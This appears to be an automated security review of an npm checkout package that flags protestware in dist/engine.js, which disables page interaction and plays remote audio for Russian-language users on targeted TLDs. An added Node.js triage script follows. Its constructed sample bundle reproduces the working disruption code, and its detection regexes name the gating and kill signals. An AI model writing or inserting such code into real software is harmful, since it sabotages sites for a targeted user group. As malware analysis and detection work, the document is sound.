AI Security Review
scanned 8h ago · by lpm-firewall-ai
The bundled browser script contains protestware that disrupts pages for Russian-language users on targeted TLDs. It persists a localStorage timestamp, then disables page interaction and plays remote audio after a delay window.
Static reason
One or more suspicious static signals were detected.
Trigger
Loading dist/engine.js in a browser whose navigator.language is Russian, on a host with a targeted TLD, once the localStorage delay window has elapsed
Impact
Affected storefront pages can become unusable and play unsolicited remote audio.
Mechanism
protestware page disruption in bundled dependency code
Attack narrative
When the package's main browser bundle loads, embedded SweetAlert2 code checks navigator.language and the page host. For Russian-language users on targeted TLDs it records a localStorage timestamp; once the delay threshold has passed, it disables pointer events on document.body and appends a looping audio element sourced from flag-gimn.ru. This is non-consensual runtime disruption unrelated to checkout behavior.
Rationale
Static inspection confirms concrete protestware in the shipped main bundle, despite otherwise package-aligned checkout API behavior and no install hook. Because the code can intentionally degrade consumer sites for a targeted user/host class, this is malicious rather than a noisy scanner hit.
Evidence
- package.json
- dist/engine.js
- readme.md
- localStorage: swal-initiation
- document.body
- injected audio element
Network endpoints (1)
flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3
Decision evidence
public snapshot: AI called this Malicious at 92.0% confidence as Malware with low false-positive risk.
Evidence for block
- dist/engine.js bundles SweetAlert2 code that checks Russian browser language and .ru/.su/.by/xn--p1ai hosts.
- dist/engine.js stores localStorage key swal-initiation and after 3 days disables document.body pointer events.
- dist/engine.js injects looping audio from https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3.
- Behavior is import/runtime activated in the browser, not limited to a documented user-invoked feature.
Evidence against
- package.json has no npm lifecycle hooks or bin entries.
- Main package functionality is a checkout engine with Konnektive/CheckoutChamp API calls.
- Scanner secret hint appears to be test card numbers/config values, not hardcoded credentials.
- No child_process, filesystem writes, native binaries, or AI-agent control-surface writes found.
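As an added worked example, not the scanner's output or the package's own code, the following Node.js script turns the reasoning in the attack narrative and in the evidence lists above into a static triage check: it scans bundle text for the combination of signals that together indicate the described protestware (language gate, targeted-TLD gate, the swal-initiation localStorage key, a pointer-events kill, a remote audio element) and separately checks package.json for install-time lifecycle hooks. The regexes, signal names and verdict thresholds are this example's own assumptions, and the package.json and bundle inputs are constructed to mimic the described behavior; they are not copied from the real dist/engine.js.

```javascript
// Added example, not the scanner's or the package's own code: a static triage
// check that mirrors the review's reasoning. Regexes, names and thresholds are
// this example's assumptions; the inputs below are constructed, not copied from
// the real dist/engine.js.

// Each signal alone is common in benign code; only the gated combination with a
// disruptive effect is treated as malicious (see the verdict logic in scanBundle).
const SIGNALS = {
  languageGate: /navigator\.language/,                       // reads the UI language
  tldGate: /["']\.(?:ru|su|by|xn--p1ai)["']/,                 // quoted target TLD literals
  delayKey: /swal-initiation/,                                // localStorage key named in the review
  pointerEventsKill: /pointer-?events\s*[:=]\s*["']?none/i,   // disables page interaction
  remoteAudio: /createElement\(\s*["']audio["']\s*\)|new\s+Audio\(/,
  audioHost: /flag-gimn\.ru/,                                 // endpoint named in the review
};

// npm lifecycle scripts that run at install time without any user action.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

function scanBundle(source) {
  const hits = {};
  for (const [name, re] of Object.entries(SIGNALS)) hits[name] = re.test(source);
  const gated = hits.languageGate && hits.tldGate;
  const disruptive = hits.pointerEventsKill || hits.remoteAudio;
  let verdict = 'clean';
  if (gated && disruptive) verdict = 'malicious';     // targeted, intentional degradation
  else if (disruptive || hits.delayKey || hits.audioHost) verdict = 'suspicious';
  return { hits, verdict };
}

// Every absolute http(s) URL embedded in the bundle, de-duplicated.
function extractEndpoints(source) {
  return Array.from(new Set(source.match(/https?:\/\/[^\s"'`)]+/g) || []));
}

function installHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS.filter((h) => Object.prototype.hasOwnProperty.call(scripts, h));
}

// Produces a small report shaped like the review's evidence-for / evidence-against lists.
function triage(pkg, bundleSource) {
  const scan = scanBundle(bundleSource);
  const evidenceFor = Object.keys(scan.hits).filter((k) => scan.hits[k]);
  const evidenceAgainst = [];
  const hooks = installHooks(pkg);
  if (hooks.length === 0) evidenceAgainst.push('no npm lifecycle hooks');
  if (!(pkg && pkg.bin)) evidenceAgainst.push('no bin entries');
  return { verdict: scan.verdict, hooks, endpoints: extractEndpoints(bundleSource), evidenceFor, evidenceAgainst };
}

// Constructed package.json and minified-style bundle text mimicking the described behavior.
const SAMPLE_PKG = { name: 'example-checkout-engine', main: 'dist/engine.js', scripts: { build: 'webpack' } };
const SAMPLE_BUNDLE = [
  '!function(e,t){"object"==typeof exports?module.exports=t(require("jquery")):e.Engine=t(e.jQuery)}',
  '(this,function($){var K="swal-initiation",D=3*24*60*60*1e3;',
  'function gate(){return navigator.language.startsWith("ru")&&',
  '[".ru",".su",".by",".xn--p1ai"].some(function(t){return location.host.endsWith(t)})}',
  'function disrupt(){var s=localStorage.getItem(K);s||(s=String(Date.now()),localStorage.setItem(K,s));',
  'if(Date.now()-Number(s)>D){document.body.style.pointerEvents="none";',
  'var a=document.createElement("audio");a.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3";',
  'a.loop=!0;document.body.appendChild(a);a.play()}}gate()&&disrupt();return{checkout:function(){}}});',
].join('');
// Constructed benign bundle: uses navigator.language and localStorage for i18n only.
const BENIGN_BUNDLE = 'var lang=navigator.language.slice(0,2);localStorage.setItem("engine-lang",lang);'
  + 'fetch("https://api.example.com/checkout");';

console.log(JSON.stringify(triage(SAMPLE_PKG, SAMPLE_BUNDLE), null, 2));   // verdict: malicious
console.log(JSON.stringify(triage(SAMPLE_PKG, BENIGN_BUNDLE), null, 2));   // verdict: clean
```

The benign bundle trips the languageGate signal but nothing else, so it stays clean; an ungated pointer-events kill or remote audio element alone is reported as suspicious rather than malicious, which is the distinction the rationale above draws between a noisy scanner hit and targeted degradation.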
Behavioral surface
ChildProcess · Eval
HighEntropyStrings · Minified · TrivialUrlStrings
Source & flagged code
3 flagged · dist/engine.js
patternName = google_api_key
severity = high
line = 1
matchedText = !functio...)));
High
patternName = google_api_key
severity = high
line = 1
matchedText = !functio...)));
High
!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t(require("jQuery"));else if("function"==typeof define&&define.amd)define(["jQuery"],t);else{var ...
Low
Eval
Package source references a known benign dynamic code generation pattern.
dist/engine.js · L1
Findings
2 High · 4 Low
- High · High Secret · dist/engine.js
- High · Secret Pattern · dist/engine.js
- Low · Scripts Present
- Low · Eval · dist/engine.js
- Low · High Entropy Strings
- Low · Url Strings